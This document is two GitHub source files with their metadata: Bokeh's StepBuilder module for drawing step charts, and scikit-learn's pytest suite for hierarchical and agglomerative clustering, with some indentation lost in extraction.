"""This is the Bokeh charts interface. It gives you a high level API to build
complex plot is a simple way.
This is the Step class which lets you build your Step charts just
passing the arguments to the Chart class and calling the proper functions.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import numpy as np
from six import string_types
from ..utils import cycle_colors
from .._builder import create_and_build, Builder
from ...models import ColumnDataSource, DataRange1d, GlyphRenderer
from ...models.glyphs import Line
from ...properties import Any
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
def Step(values, index=None, **kws):
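    """Create a Step chart by delegating to :class:`StepBuilder`.
    ``values`` holds the data series, ``index`` (optional) selects or supplies
    the common x values, and any extra keyword arguments are forwarded to the
    chart machinery via ``create_and_build``.
    """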
return create_and_build(StepBuilder, values, index=index, **kws)
class StepBuilder(Builder):
"""This is the Step class and it is in charge of plotting
Step charts in an easy and intuitive way.
Essentially, we provide a way to ingest the data, make the proper
calculations and push the references into a source object.
We additionally make calculations for the ranges.
And finally add the needed lines taking the references from the
source.
"""
index = Any(help="""
An index to be used for all data series as follows:
    - A 1d iterable of any sort that will be used as
      the common index of the series
    - A string that corresponds to the key of the
      mapping to be used as the index (and not as a data
      series) if Step.values is a mapping (like a dict,
      an OrderedDict or a pandas DataFrame)
""")
def get_data(self):
"""It calculates the chart properties accordingly from Step.values.
Then build a dict containing references to all the points to be
used by the segment glyph inside the ``draw`` method.
"""
self._data = dict()
self._groups = []
orig_xs = self._values_index
        # note: the ``np.int`` alias was removed from NumPy; builtin int is equivalent
        xs = np.empty(2 * len(orig_xs) - 1, dtype=int)
xs[::2] = orig_xs[:]
xs[1::2] = orig_xs[1:]
self._data['x'] = xs
for i, col in enumerate(self._values.keys()):
if isinstance(self.index, string_types) and col == self.index:
continue
# save every new group we find
self._groups.append(col)
orig_ys = np.array([self._values[col][x] for x in orig_xs])
ys = np.empty(2*len(orig_ys)-1)
ys[::2] = orig_ys[:]
ys[1::2] = orig_ys[:-1]
self._data['y_%s' % col] = ys
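        # Worked example of the interleaving above (hypothetical values):
        #   orig_xs = [0, 1, 2], orig_ys = [a, b, c]
        #   xs -> [0, 1, 1, 2, 2], ys -> [a, a, b, b, c]
        # so each y value is held flat until the next x, which produces the
        # step shape when the (x, y) pairs are drawn as a single line.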
def get_source(self):
""" Push the Step data into the ColumnDataSource and calculate
the proper ranges.
"""
sc = self._source = ColumnDataSource(self._data)
self.x_range = DataRange1d(sources=[sc.columns("x")])
y_sources = [sc.columns("y_%s" % col) for col in self._groups]
self.y_range = DataRange1d(sources=y_sources)
def draw(self):
"""Use the line glyphs to connect the xy points in the Step.
        Takes reference points from the data loaded into the ColumnDataSource.
"""
colors = cycle_colors(self._groups, self.palette)
for i, name in enumerate(self._groups):
# draw the step horizontal segment
glyph = Line(x="x", y="y_%s" % name, line_color=colors[i], line_width=2)
renderer = GlyphRenderer(data_source=self._source, glyph=glyph)
self._legends.append((self._groups[i], [renderer]))
yield renderer
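# A minimal usage sketch, assuming the bokeh.charts API of this era and purely
# hypothetical data (not part of this module):
#
#     from bokeh.charts import Step
#     from bokeh.plotting import output_file, show
#
#     values = dict(python=[2, 3, 7, 5, 26], pypy=[12, 33, 47, 15, 126])
#     chart = Step(values, index=[0, 1, 2, 3, 4], title='Step chart')
#     output_file('step.html')
#     show(chart)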
|
{
"content_hash": "69218cd2468342fd71b76b8b4022e787",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 84,
"avg_line_length": 36.47747747747748,
"alnum_prop": 0.561373178562608,
"repo_name": "almarklein/bokeh",
"id": "ec3b68abc5c1a31973d9c5fda476b1f7e4b8fa1d",
"size": "4049",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/charts/builder/step_builder.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "410607"
},
{
"name": "CoffeeScript",
"bytes": "2138603"
},
{
"name": "JavaScript",
"bytes": "349966"
},
{
"name": "Makefile",
"bytes": "6253"
},
{
"name": "Python",
"bytes": "1543731"
},
{
"name": "Scala",
"bytes": "28963"
},
{
"name": "Shell",
"bytes": "20366"
}
],
"symlink_target": ""
}
|
"""
Several basic tests for hierarchical clustering procedures
"""
# Authors: Vincent Michel, 2010, Gael Varoquaux 2012,
# Matteo Visconti di Oleggio Castello 2014
# License: BSD 3 clause
import itertools
from tempfile import mkdtemp
import shutil
import pytest
from functools import partial
import numpy as np
from scipy import sparse
from scipy.cluster import hierarchy
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.neighbors.tests.test_dist_metrics import METRICS_DEFAULT_PARAMS
from sklearn.utils._testing import (
assert_almost_equal,
create_memmap_backed_data
)
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import ignore_warnings
from sklearn.cluster import ward_tree
from sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration
from sklearn.cluster._agglomerative import (_hc_cut, _TREE_BUILDERS,
linkage_tree,
_fix_connectivity)
from sklearn.feature_extraction.image import grid_to_graph
from sklearn.metrics.pairwise import PAIRED_DISTANCES, cosine_distances,\
manhattan_distances, pairwise_distances
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.neighbors import kneighbors_graph, DistanceMetric
from sklearn.cluster._hierarchical_fast import (
average_merge,
max_merge,
mst_linkage_core
)
from sklearn.utils._fast_dict import IntFloatDict
from sklearn.utils._testing import assert_array_equal
from sklearn.datasets import make_moons, make_circles
def test_linkage_misc():
# Misc tests on linkage
rng = np.random.RandomState(42)
X = rng.normal(size=(5, 5))
with pytest.raises(ValueError):
AgglomerativeClustering(linkage='foo').fit(X)
with pytest.raises(ValueError):
linkage_tree(X, linkage='foo')
with pytest.raises(ValueError):
linkage_tree(X, connectivity=np.ones((4, 4)))
# Smoke test FeatureAgglomeration
FeatureAgglomeration().fit(X)
# test hierarchical clustering on a precomputed distances matrix
dis = cosine_distances(X)
res = linkage_tree(dis, affinity="precomputed")
assert_array_equal(res[0], linkage_tree(X, affinity="cosine")[0])
# test hierarchical clustering on a precomputed distances matrix
res = linkage_tree(X, affinity=manhattan_distances)
assert_array_equal(res[0], linkage_tree(X, affinity="manhattan")[0])
def test_structured_linkage_tree():
# Check that we obtain the correct solution for structured linkage trees.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
# Avoiding a mask with only 'True' entries
mask[4:7, 4:7] = 0
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for tree_builder in _TREE_BUILDERS.values():
children, n_components, n_leaves, parent = \
tree_builder(X.T, connectivity=connectivity)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
# Check that ward_tree raises a ValueError with a connectivity matrix
# of the wrong shape
with pytest.raises(ValueError):
tree_builder(X.T, connectivity=np.ones((4, 4)))
# Check that fitting with no samples raises an error
with pytest.raises(ValueError):
tree_builder(X.T[:0], connectivity=connectivity)
def test_unstructured_linkage_tree():
# Check that we obtain the correct solution for unstructured linkage trees.
rng = np.random.RandomState(0)
X = rng.randn(50, 100)
for this_X in (X, X[0]):
        # Specify a number of clusters just for the sake of
        # raising a warning and testing the warning code
with ignore_warnings():
with pytest.warns(UserWarning):
children, n_nodes, n_leaves, parent = ward_tree(
this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
for tree_builder in _TREE_BUILDERS.values():
for this_X in (X, X[0]):
with ignore_warnings():
with pytest.warns(UserWarning):
children, n_nodes, n_leaves, parent = tree_builder(
this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
def test_height_linkage_tree():
    # Check that each linkage tree builder yields a tree with the expected
    # number of nodes.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for linkage_func in _TREE_BUILDERS.values():
children, n_nodes, n_leaves, parent = linkage_func(
X.T, connectivity=connectivity)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
def test_agglomerative_clustering_wrong_arg_memory():
    # Test that an error is raised when memory is neither a str
    # nor a joblib.Memory instance
rng = np.random.RandomState(0)
n_samples = 100
X = rng.randn(n_samples, 50)
memory = 5
clustering = AgglomerativeClustering(memory=memory)
with pytest.raises(ValueError):
clustering.fit(X)
def test_zero_cosine_linkage_tree():
# Check that zero vectors in X produce an error when
# 'cosine' affinity is used
X = np.array([[0, 1],
[0, 0]])
msg = 'Cosine affinity cannot be used when X contains zero vectors'
with pytest.raises(ValueError, match=msg):
linkage_tree(X, affinity='cosine')
@pytest.mark.parametrize('n_clusters, distance_threshold',
[(None, 0.5), (10, None)])
@pytest.mark.parametrize('compute_distances', [True, False])
@pytest.mark.parametrize('linkage', ["ward", "complete", "average", "single"])
def test_agglomerative_clustering_distances(n_clusters,
compute_distances,
distance_threshold,
linkage):
# Check that when `compute_distances` is True or `distance_threshold` is
# given, the fitted model has an attribute `distances_`.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
clustering = AgglomerativeClustering(n_clusters=n_clusters,
connectivity=connectivity,
linkage=linkage,
distance_threshold=distance_threshold,
compute_distances=compute_distances)
clustering.fit(X)
if compute_distances or (distance_threshold is not None):
assert hasattr(clustering, 'distances_')
n_children = clustering.children_.shape[0]
n_nodes = n_children + 1
assert clustering.distances_.shape == (n_nodes-1, )
else:
assert not hasattr(clustering, 'distances_')
def test_agglomerative_clustering():
# Check that we obtain the correct number of clusters with
# agglomerative clustering.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
for linkage in ("ward", "complete", "average", "single"):
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage=linkage)
clustering.fit(X)
# test caching
try:
tempdir = mkdtemp()
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity,
memory=tempdir,
linkage=linkage)
clustering.fit(X)
labels = clustering.labels_
assert np.size(np.unique(labels)) == 10
finally:
shutil.rmtree(tempdir)
# Turn caching off now
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity, linkage=linkage)
# Check that we obtain the same solution with early-stopping of the
# tree building
clustering.compute_full_tree = False
clustering.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
labels), 1)
clustering.connectivity = None
clustering.fit(X)
assert np.size(np.unique(clustering.labels_)) == 10
        # Check that a ValueError is raised when the connectivity matrix has
        # the wrong shape
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=sparse.lil_matrix(
connectivity.toarray()[:10, :10]),
linkage=linkage)
with pytest.raises(ValueError):
clustering.fit(X)
# Test that using ward with another metric than euclidean raises an
# exception
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=connectivity.toarray(),
affinity="manhattan",
linkage="ward")
with pytest.raises(ValueError):
clustering.fit(X)
# Test using another metric than euclidean works with linkage complete
for affinity in PAIRED_DISTANCES.keys():
# Compare our (structured) implementation to scipy
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=np.ones((n_samples, n_samples)),
affinity=affinity,
linkage="complete")
clustering.fit(X)
clustering2 = AgglomerativeClustering(
n_clusters=10,
connectivity=None,
affinity=affinity,
linkage="complete")
clustering2.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering2.labels_,
clustering.labels_),
1)
# Test that using a distance matrix (affinity = 'precomputed') has same
# results (with connectivity constraints)
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage="complete")
clustering.fit(X)
X_dist = pairwise_distances(X)
clustering2 = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
affinity='precomputed',
linkage="complete")
clustering2.fit(X_dist)
assert_array_equal(clustering.labels_, clustering2.labels_)
def test_agglomerative_clustering_memory_mapped():
"""AgglomerativeClustering must work on mem-mapped dataset.
Non-regression test for issue #19875.
"""
rng = np.random.RandomState(0)
Xmm = create_memmap_backed_data(rng.randn(50, 100))
AgglomerativeClustering(affinity="euclidean", linkage="single").fit(Xmm)
def test_ward_agglomeration():
# Check that we obtain the correct solution in a simplistic case
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
agglo = FeatureAgglomeration(n_clusters=5, connectivity=connectivity)
agglo.fit(X)
assert np.size(np.unique(agglo.labels_)) == 5
X_red = agglo.transform(X)
assert X_red.shape[1] == 5
X_full = agglo.inverse_transform(X_red)
assert np.unique(X_full[0]).size == 5
assert_array_almost_equal(agglo.transform(X_full), X_red)
# Check that fitting with no samples raises a ValueError
with pytest.raises(ValueError):
agglo.fit(X[:0])
def test_single_linkage_clustering():
# Check that we get the correct result in two emblematic cases
moons, moon_labels = make_moons(noise=0.05, random_state=42)
clustering = AgglomerativeClustering(n_clusters=2, linkage='single')
clustering.fit(moons)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
moon_labels), 1)
circles, circle_labels = make_circles(factor=0.5, noise=0.025,
random_state=42)
clustering = AgglomerativeClustering(n_clusters=2, linkage='single')
clustering.fit(circles)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
circle_labels), 1)
def assess_same_labelling(cut1, cut2):
"""Util for comparison with scipy"""
co_clust = []
for cut in [cut1, cut2]:
n = len(cut)
k = cut.max() + 1
ecut = np.zeros((n, k))
ecut[np.arange(n), cut] = 1
co_clust.append(np.dot(ecut, ecut.T))
assert (co_clust[0] == co_clust[1]).all()
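# Worked example of the co-clustering check above (hypothetical cut): for
# cut = [0, 0, 1], ecut is the one-hot matrix [[1, 0], [1, 0], [0, 1]] and
# np.dot(ecut, ecut.T) marks which pairs of samples share a cluster, so two
# cuts are the same labelling (up to label permutation) iff these pairwise
# co-clustering matrices match.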
def test_sparse_scikit_vs_scipy():
# Test scikit linkage with full connectivity (i.e. unstructured) vs scipy
n, p, k = 10, 5, 3
rng = np.random.RandomState(0)
    # Not using a lil_matrix here, just to check that non-sparse
    # matrices are well handled
connectivity = np.ones((n, n))
for linkage in _TREE_BUILDERS.keys():
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out = hierarchy.linkage(X, method=linkage)
children_ = out[:, :2].astype(int, copy=False)
children, _, n_leaves, _ = _TREE_BUILDERS[linkage](
X, connectivity=connectivity)
# Sort the order of child nodes per row for consistency
children.sort(axis=1)
assert_array_equal(children, children_, 'linkage tree differs'
' from scipy impl for'
' linkage: ' + linkage)
cut = _hc_cut(k, children, n_leaves)
cut_ = _hc_cut(k, children_, n_leaves)
assess_same_labelling(cut, cut_)
# Test error management in _hc_cut
with pytest.raises(ValueError):
_hc_cut(n_leaves + 1, children, n_leaves)
# Make sure our custom mst_linkage_core gives
# the same results as scipy's builtin
@pytest.mark.parametrize('seed', range(5))
def test_vector_scikit_single_vs_scipy_single(seed):
n_samples, n_features, n_clusters = 10, 5, 3
rng = np.random.RandomState(seed)
X = .1 * rng.normal(size=(n_samples, n_features))
X -= 4. * np.arange(n_samples)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out = hierarchy.linkage(X, method='single')
children_scipy = out[:, :2].astype(int)
children, _, n_leaves, _ = _TREE_BUILDERS['single'](X)
# Sort the order of child nodes per row for consistency
children.sort(axis=1)
assert_array_equal(children, children_scipy,
'linkage tree differs'
' from scipy impl for'
' single linkage.')
cut = _hc_cut(n_clusters, children, n_leaves)
cut_scipy = _hc_cut(n_clusters, children_scipy, n_leaves)
assess_same_labelling(cut, cut_scipy)
@pytest.mark.parametrize('metric', METRICS_DEFAULT_PARAMS)
def test_mst_linkage_core_memory_mapped(metric):
"""The MST-LINKAGE-CORE algorithm must work on mem-mapped dataset.
Non-regression test for issue #19875.
"""
rng = np.random.RandomState(seed=1)
X = rng.normal(size=(20, 4))
Xmm = create_memmap_backed_data(X)
argdict = METRICS_DEFAULT_PARAMS[metric]
keys = argdict.keys()
for vals in itertools.product(*argdict.values()):
kwargs = dict(zip(keys, vals))
distance_metric = DistanceMetric.get_metric(metric, **kwargs)
mst = mst_linkage_core(X, distance_metric)
mst_mm = mst_linkage_core(Xmm, distance_metric)
np.testing.assert_equal(mst, mst_mm)
def test_identical_points():
# Ensure identical points are handled correctly when using mst with
# a sparse connectivity matrix
X = np.array([[0, 0, 0], [0, 0, 0],
[1, 1, 1], [1, 1, 1],
[2, 2, 2], [2, 2, 2]])
true_labels = np.array([0, 0, 1, 1, 2, 2])
connectivity = kneighbors_graph(X, n_neighbors=3, include_self=False)
connectivity = 0.5 * (connectivity + connectivity.T)
connectivity, n_components = _fix_connectivity(X,
connectivity,
'euclidean')
    for linkage in ('single', 'average', 'complete', 'ward'):
clustering = AgglomerativeClustering(n_clusters=3,
linkage=linkage,
connectivity=connectivity)
clustering.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
true_labels), 1)
def test_connectivity_propagation():
# Check that connectivity in the ward tree is propagated correctly during
# merging.
X = np.array([(.014, .120), (.014, .099), (.014, .097),
(.017, .153), (.017, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .152), (.018, .149), (.018, .144)])
connectivity = kneighbors_graph(X, 10, include_self=False)
ward = AgglomerativeClustering(
n_clusters=4, connectivity=connectivity, linkage='ward')
# If changes are not propagated correctly, fit crashes with an
# IndexError
ward.fit(X)
def test_ward_tree_children_order():
# Check that children are ordered in the same way for both structured and
# unstructured versions of ward_tree.
# test on five random datasets
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X)
out_structured = ward_tree(X, connectivity=connectivity)
assert_array_equal(out_unstructured[0], out_structured[0])
def test_ward_linkage_tree_return_distance():
# Test return_distance option on linkage and ward trees
    # Test that return_distance, when set to True, gives the same
    # output for both structured and unstructured clustering.
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X, return_distance=True)
out_structured = ward_tree(X, connectivity=connectivity,
return_distance=True)
# get children
children_unstructured = out_unstructured[0]
children_structured = out_structured[0]
# check if we got the same clusters
assert_array_equal(children_unstructured, children_structured)
# check if the distances are the same
dist_unstructured = out_unstructured[-1]
dist_structured = out_structured[-1]
assert_array_almost_equal(dist_unstructured, dist_structured)
for linkage in ['average', 'complete', 'single']:
structured_items = linkage_tree(
X, connectivity=connectivity, linkage=linkage,
return_distance=True)[-1]
unstructured_items = linkage_tree(
X, linkage=linkage, return_distance=True)[-1]
structured_dist = structured_items[-1]
unstructured_dist = unstructured_items[-1]
structured_children = structured_items[0]
unstructured_children = unstructured_items[0]
assert_array_almost_equal(structured_dist, unstructured_dist)
assert_array_almost_equal(
structured_children, unstructured_children)
# test on the following dataset where we know the truth
# taken from scipy/cluster/tests/hierarchy_test_data.py
X = np.array([[1.43054825, -7.5693489],
[6.95887839, 6.82293382],
[2.87137846, -9.68248579],
[7.87974764, -6.05485803],
[8.24018364, -6.09495602],
[7.39020262, 8.54004355]])
# truth
linkage_X_ward = np.array([[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 9.10208346, 4.],
[7., 9., 24.7784379, 6.]])
linkage_X_complete = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.96742194, 4.],
[7., 9., 18.77445997, 6.]])
linkage_X_average = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.55832839, 4.],
[7., 9., 15.44089605, 6.]])
n_samples, n_features = np.shape(X)
connectivity_X = np.ones((n_samples, n_samples))
out_X_unstructured = ward_tree(X, return_distance=True)
out_X_structured = ward_tree(X, connectivity=connectivity_X,
return_distance=True)
# check that the labels are the same
assert_array_equal(linkage_X_ward[:, :2], out_X_unstructured[0])
assert_array_equal(linkage_X_ward[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_unstructured[4])
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_structured[4])
linkage_options = ['complete', 'average', 'single']
X_linkage_truth = [linkage_X_complete, linkage_X_average]
for (linkage, X_truth) in zip(linkage_options, X_linkage_truth):
out_X_unstructured = linkage_tree(
X, return_distance=True, linkage=linkage)
out_X_structured = linkage_tree(
X, connectivity=connectivity_X, linkage=linkage,
return_distance=True)
# check that the labels are the same
assert_array_equal(X_truth[:, :2], out_X_unstructured[0])
assert_array_equal(X_truth[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(X_truth[:, 2], out_X_unstructured[4])
assert_array_almost_equal(X_truth[:, 2], out_X_structured[4])
def test_connectivity_fixing_non_lil():
    # Non-regression check for a bug when a connectivity matrix that does not
    # support item assignment is provided with more than one component.
# create dummy data
x = np.array([[0, 0], [1, 1]])
# create a mask with several components to force connectivity fixing
m = np.array([[True, False], [False, True]])
c = grid_to_graph(n_x=2, n_y=2, mask=m)
w = AgglomerativeClustering(connectivity=c, linkage='ward')
with pytest.warns(UserWarning):
w.fit(x)
def test_int_float_dict():
rng = np.random.RandomState(0)
keys = np.unique(rng.randint(100, size=10).astype(np.intp, copy=False))
values = rng.rand(len(keys))
d = IntFloatDict(keys, values)
for key, value in zip(keys, values):
assert d[key] == value
other_keys = np.arange(50, dtype=np.intp)[::2]
other_values = np.full(50, 0.5)[::2]
other = IntFloatDict(other_keys, other_values)
# Complete smoke test
max_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
average_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
def test_connectivity_callable():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(
connectivity=partial(kneighbors_graph, n_neighbors=3,
include_self=False))
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_connectivity_ignores_diagonal():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
connectivity_include_self = kneighbors_graph(X, 3, include_self=True)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(connectivity=connectivity_include_self)
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_compute_full_tree():
# Test that the full tree is computed if n_clusters is small
rng = np.random.RandomState(0)
X = rng.randn(10, 2)
connectivity = kneighbors_graph(X, 5, include_self=False)
    # When n_clusters is small, the full tree should be built,
    # i.e. the number of merges should be n_samples - 1
agc = AgglomerativeClustering(n_clusters=2, connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert n_nodes == n_samples - 1
    # When n_clusters is large (greater than max(100, 0.02 * n_samples)),
    # tree building should stop early, once n_clusters clusters remain.
n_clusters = 101
X = rng.randn(200, 2)
connectivity = kneighbors_graph(X, 10, include_self=False)
agc = AgglomerativeClustering(n_clusters=n_clusters,
connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert n_nodes == n_samples - n_clusters
def test_n_components():
# Test n_components returned by linkage, average and ward tree
rng = np.random.RandomState(0)
X = rng.rand(5, 5)
# Connectivity matrix having five components.
connectivity = np.eye(5)
for linkage_func in _TREE_BUILDERS.values():
assert ignore_warnings(linkage_func)(
X, connectivity=connectivity)[1] == 5
def test_agg_n_clusters():
# Test that an error is raised when n_clusters <= 0
rng = np.random.RandomState(0)
X = rng.rand(20, 10)
for n_clus in [-1, 0]:
agc = AgglomerativeClustering(n_clusters=n_clus)
msg = ("n_clusters should be an integer greater than 0."
" %s was provided." % str(agc.n_clusters))
with pytest.raises(ValueError, match=msg):
agc.fit(X)
def test_affinity_passed_to_fix_connectivity():
# Test that the affinity parameter is actually passed to the pairwise
# function
size = 2
rng = np.random.RandomState(0)
X = rng.randn(size, size)
mask = np.array([True, False, False, True])
connectivity = grid_to_graph(n_x=size, n_y=size,
mask=mask, return_as=np.ndarray)
class FakeAffinity:
def __init__(self):
self.counter = 0
def increment(self, *args, **kwargs):
self.counter += 1
return self.counter
fa = FakeAffinity()
linkage_tree(X, connectivity=connectivity, affinity=fa.increment)
assert fa.counter == 3
@pytest.mark.parametrize('linkage', ['ward', 'complete', 'average'])
def test_agglomerative_clustering_with_distance_threshold(linkage):
# Check that we obtain the correct number of clusters with
# agglomerative clustering with distance_threshold.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
# test when distance threshold is set to 10
distance_threshold = 10
for conn in [None, connectivity]:
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=distance_threshold,
connectivity=conn, linkage=linkage)
clustering.fit(X)
clusters_produced = clustering.labels_
num_clusters_produced = len(np.unique(clustering.labels_))
# test if the clusters produced match the point in the linkage tree
# where the distance exceeds the threshold
tree_builder = _TREE_BUILDERS[linkage]
children, n_components, n_leaves, parent, distances = \
tree_builder(X, connectivity=conn, n_clusters=None,
return_distance=True)
num_clusters_at_threshold = np.count_nonzero(
distances >= distance_threshold) + 1
# test number of clusters produced
assert num_clusters_at_threshold == num_clusters_produced
# test clusters produced
clusters_at_threshold = _hc_cut(n_clusters=num_clusters_produced,
children=children,
n_leaves=n_leaves)
assert np.array_equiv(clusters_produced,
clusters_at_threshold)
def test_small_distance_threshold():
rng = np.random.RandomState(0)
n_samples = 10
X = rng.randint(-300, 300, size=(n_samples, 3))
    # this should result in all data in their own clusters, given that
    # their pairwise distances are bigger than 1 (which may not be the case
    # with a different random seed).
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=1.,
linkage="single").fit(X)
    # check that the pairwise distances are indeed all larger than the
    # distance_threshold of 1
    all_distances = pairwise_distances(X, metric='minkowski', p=2)
    np.fill_diagonal(all_distances, np.inf)
    assert np.all(all_distances > 1.)
assert clustering.n_clusters_ == n_samples
def test_cluster_distances_with_distance_threshold():
rng = np.random.RandomState(0)
n_samples = 100
X = rng.randint(-10, 10, size=(n_samples, 3))
# check the distances within the clusters and with other clusters
distance_threshold = 4
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=distance_threshold,
linkage="single").fit(X)
labels = clustering.labels_
D = pairwise_distances(X, metric="minkowski", p=2)
# to avoid taking the 0 diagonal in min()
np.fill_diagonal(D, np.inf)
for label in np.unique(labels):
in_cluster_mask = labels == label
max_in_cluster_distance = (D[in_cluster_mask][:, in_cluster_mask]
.min(axis=0).max())
min_out_cluster_distance = (D[in_cluster_mask][:, ~in_cluster_mask]
.min(axis=0).min())
# single data point clusters only have that inf diagonal here
if in_cluster_mask.sum() > 1:
assert max_in_cluster_distance < distance_threshold
assert min_out_cluster_distance >= distance_threshold
@pytest.mark.parametrize('linkage', ['ward', 'complete', 'average'])
@pytest.mark.parametrize(('threshold', 'y_true'),
[(0.5, [1, 0]), (1.0, [1, 0]), (1.5, [0, 0])])
def test_agglomerative_clustering_with_distance_threshold_edge_case(
linkage, threshold, y_true):
# test boundary case of distance_threshold matching the distance
X = [[0], [1]]
clusterer = AgglomerativeClustering(
n_clusters=None,
distance_threshold=threshold,
linkage=linkage)
y_pred = clusterer.fit_predict(X)
assert adjusted_rand_score(y_true, y_pred) == 1
def test_dist_threshold_invalid_parameters():
X = [[0], [1]]
with pytest.raises(ValueError, match="Exactly one of "):
AgglomerativeClustering(n_clusters=None,
distance_threshold=None).fit(X)
with pytest.raises(ValueError, match="Exactly one of "):
AgglomerativeClustering(n_clusters=2,
distance_threshold=1).fit(X)
X = [[0], [1]]
with pytest.raises(ValueError, match="compute_full_tree must be True if"):
AgglomerativeClustering(n_clusters=None,
distance_threshold=1,
compute_full_tree=False).fit(X)
def test_invalid_shape_precomputed_dist_matrix():
# Check that an error is raised when affinity='precomputed'
# and a non square matrix is passed (PR #16257).
rng = np.random.RandomState(0)
X = rng.rand(5, 3)
with pytest.raises(ValueError, match="Distance matrix should be square, "):
AgglomerativeClustering(affinity='precomputed',
linkage='complete').fit(X)
|
{
"content_hash": "bef0493a72b3f10ff132fb4ecf448a11",
"timestamp": "",
"source": "github",
"line_count": 837,
"max_line_length": 79,
"avg_line_length": 39.05615292712067,
"alnum_prop": 0.6093300703579076,
"repo_name": "kevin-intel/scikit-learn",
"id": "bd70b2c1aac543a5b8b8e45f59c9def0d3a3924a",
"size": "32690",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sklearn/cluster/tests/test_hierarchical.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1579"
},
{
